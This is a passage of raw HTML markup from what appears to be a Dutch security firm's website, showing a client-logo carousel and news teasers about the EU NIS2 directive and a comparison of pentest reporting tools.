/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20erasmus%20university%20rotterdam.b5c43ab2.png&amp;w=1400&amp;q=75"></div><div class="h-16 lg:h-20 max-w-[200px] relative fxc shrink-0 rounded-md overflow-hidden"><img alt="client image" loading="lazy" decoding="async" data-nimg="fill" class="object-scale-down !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20worldline.9fe6d677.png&amp;w=1400&amp;q=75"></div><div class="h-16 lg:h-20 max-w-[200px] relative fxc shrink-0 rounded-md overflow-hidden"><img alt="client image" loading="lazy" decoding="async" data-nimg="fill" class="object-scale-down !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20robobank.2dc7499a.png&amp;w=1400&amp;q=75"></div><div class="h-16 lg:h-20 max-w-[200px] relative fxc shrink-0 rounded-md overflow-hidden"><img alt="client image" loading="lazy" decoding="async" data-nimg="fill" class="object-scale-down !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20hogeschool%20novi.9ab80a5a.svg&amp;w=1400&amp;q=75"></div><div class="h-16 lg:h-20 max-w-[200px] relative fxc shrink-0 rounded-md overflow-hidden"><img alt="client image" loading="lazy" decoding="async" data-nimg="fill" class="object-scale-down !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="220px" srcset="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=16&amp;q=75 16w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=32&amp;q=75 32w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=48&amp;q=75 48w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=60&amp;q=75 60w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=64&amp;q=75 64w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=96&amp;q=75 96w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=120&amp;q=75 120w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=128&amp;q=75 128w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=220&amp;q=75 220w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=256&amp;q=75 256w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=360&amp;q=75 360w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=384&amp;q=75 384w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=425&amp;q=75 425w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=480&amp;q=75 480w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=640&amp;q=75 640w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=750&amp;q=75 750w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=828&amp;q=75 828w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=1080&amp;q=75 1080w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=1111&amp;q=75 1111w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=1200&amp;q=75 1200w, /_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=1400&amp;q=75 1400w" src="/_next/image?url=%2F_next%2Fstatic%2Fmedia%2Fwebsec%20client%20-%20binkadvies.2f6f0bab.png&amp;w=1400&amp;q=75"></div></div></section><section class="px-5 mx-auto my-20 md:my-24 lg:my-36 space-y-10 lg:space-y-14 max-w-6xl xl:px-5" id="new blog posts"><h2 class="text-2xl md:text-3xl lg:text-4xl 2xl:text-[2.75rem] font-semibold !leading-snug text-center">Nieuws</h2><div class="grid  sm:grid-cols-2 lg:grid-cols-[5fr,5fr,6fr] items-start  sm:grid-rows-[auto,auto,1fr] gap-5 sm:gap-x-9 xs:gap-y-6"><a class="fxcol row-span-full group" href="https://websec.nl/blog/hoe-voorbereiden-op-de-eu-nis2-richtlijn-66e7e1e736fedf63f949be33"><div class="aspect-16/10 w-full rounded-lg sm:rounded-xl overflow-hidden mb-5"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-cover !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="(max-width: 480px) 99vw, (max-width: 1020px) 45vw, 333px" srcset="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=32&amp;q=92 32w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=48&amp;q=92 48w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=60&amp;q=92 60w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=64&amp;q=92 64w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=96&amp;q=92 96w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=120&amp;q=92 120w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=128&amp;q=92 128w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=220&amp;q=92 220w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=256&amp;q=92 256w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=360&amp;q=92 360w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=384&amp;q=92 384w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=425&amp;q=92 425w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=480&amp;q=92 480w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=640&amp;q=92 640w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=750&amp;q=92 750w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=828&amp;q=92 828w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=1080&amp;q=92 1080w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=1111&amp;q=92 1111w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=1200&amp;q=92 1200w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=1400&amp;q=92 1400w" src="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252Fc698888a-fee0-42df-8fa2-aab98ddafa29%252Fnis2_thumbnail.png%3Falt%3Dmedia%26token%3Dd9d24e9d-ffd1-4329-aad1-1fee6731ab3e&amp;w=1400&amp;q=92"></div><h3 class="text-lg xl:text-2xl font-semibold mb-3 prose">Hoe Voorbereiden op de EU NIS2 Richtlijn</h3><p class="prose prose-sm mb-3 line-clamp-4"><span lang="nl" class="inline bg-slate-200 border-slate-600 border text-whites text-xs rounded-md px-1 mr-1.5">Nederlands, English</span>Met de toename van cyberaanvallen versterkt de EU’s NIS2-richtlijn de maatregelen op het gebied van cyberbeveiliging. Ontdek hoe je NIS2-compliance kunt waarborgen met WebSec.</p><div lang="nl" class="flex items-center prose prose-sm max-sm:text-xs gap-5"><div class="text-dark-lave flex items-center gap-1.5 group group-hover:bg-dark-lave/10 p-1 px-3 rounded-full duration-150 hover:!bg-dark-lave/20 bg-dark-lave/10"><span>Lees Artikel</span> <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" height="16" width="16" xmlns="http://www.w3.org/2000/svg"><path d="M18.25 15.5a.75.75 0 0 1-.75-.75V7.56L7.28 17.78a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L16.44 6.5H9.25a.75.75 0 0 1 0-1.5h9a.75.75 0 0 1 .75.75v9a.75.75 0 0 1-.75.75Z"></path></svg></div></div></a><a class="fxcol row-span-full group" href="https://websec.nl/blog/attackforge-vs-plextrac-vergelijking-verschillen-overeenkomsten-en-alternatieven-66ad0c28ac92a30c342d4151"><div class="aspect-16/10 w-full rounded-lg sm:rounded-xl overflow-hidden mb-5"><img alt="" loading="lazy" decoding="async" data-nimg="fill" class="object-cover !relative" style="position:absolute;height:100%;width:100%;left:0;top:0;right:0;bottom:0;color:transparent" sizes="(max-width: 480px) 99vw, (max-width: 1020px) 45vw, 333px" srcset="/_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=32&amp;q=92 32w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=48&amp;q=92 48w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=60&amp;q=92 60w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=64&amp;q=92 64w, /_next/image?url=https%3A%2F%2Ffirebasestorage.googleapis.com%2Fv0%2Fb%2Fwebsec-75ef5.appspot.com%2Fo%2Fpublic%252Fblog%252F605118a0c452ea0751962bdb%252F6fbbf716-42b1-482c-a86e-e0184dd7db7c%252Fthumbnail%2520copy.png%3Falt%3Dmedia%26token%3Dfbc3747c-c6c0-42d6-a81e-123483f30077&amp;w=96&amp;q=92 96w, 